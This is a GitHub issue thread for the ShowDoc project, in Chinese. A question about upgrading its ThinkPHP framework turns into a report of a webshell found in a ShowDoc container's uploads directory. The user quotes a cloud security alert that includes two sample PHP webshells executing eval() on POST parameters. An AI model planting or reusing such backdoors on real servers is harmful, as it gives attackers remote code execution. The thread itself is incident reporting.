### ISSUE TITLE
看是基于thinkphp3.2.3的，是否有计划升级到3.2.5（3.2的最后一个版本）

### ISSUE THREAD

**Issue by herderwu** [star7th/showdoc#1314]
看是基于thinkphp3.2.3的，是否有计划升级到3.2.5（3.2的最后一个版本）

**Comment by star7th** [comment]
升级不了，因为我做过了一些兼容性改造，比如说兼容php8 。 我已经修复了几个安全问题，如果你觉得还有安全补丁没修复的可以说一下。等过两年php5彻底淘汰后，我就不需要兼容php5了，直接用其他框架重写。

**Comment by herderwu** [comment]
网站后门-发现后门（Webshell）文件隔离成功
备注
该告警由如下引擎检测发现：

木马文件路径: /proc/13109/root/var/www/html/Public/Uploads/2021-03-26/605d93657d2c5.php
影响域名: --
首次发现时间: 2021-03-26 17:29:52
更新时间: 2021-03-26 17:29:52
木马类型: Webshell
事件说明: 云安全中心在您的系统磁盘上发现了一个可疑文件，它可能代表了是黑客成功入侵网站后种植的，建议您先确认文件合法性并处理。总体上，云安全中心Webshell检测是根据文件行为威胁程度进行打分的，这个文件具备了一定的危险功能，本身具有一定的危险特征，但并不完全保证一定是一个网站后门，也可能是一些包含可疑代码的正常网站文件，如果管理员自己部署放置的，可以在前台选择忽略或者标记为误报按钮。同时，如果被告警的文件是一个.log网站日志文件，常常是因为网站将http日志直接明文保存在文件中，这样存在一定的安全风险。建议将http日志的保存路径放置到非web路径下。如果您确认是误报，可以通过【处理】->【加白】进行加白处理，加白后的路径将不会继续告警。
源文件下载: 下载
容器名: showdoc
镜像名: star7th/showdoc:latest
容器内部路径: /var/www/html/Public/Uploads/2021-03-26/605d93657d2c5.php

木马内容举例：
<?php class x{ public function ip(){ $c= " $_POST[ringo]"; return $c; } } $c = new x(); $b = $c -> ip(); eval($b); print(md5("Toku")); ?>

<?php echo 'test';@eval($_POST[test])?>

**Comment by star7th** [comment]
你的showdoc版本是什么，查看根目录下的composer.json文件里面的version字段

**Comment by star7th** [comment]
你直接命令行执行  curl  http://127.0.0.1:4999/composer.json 我看看
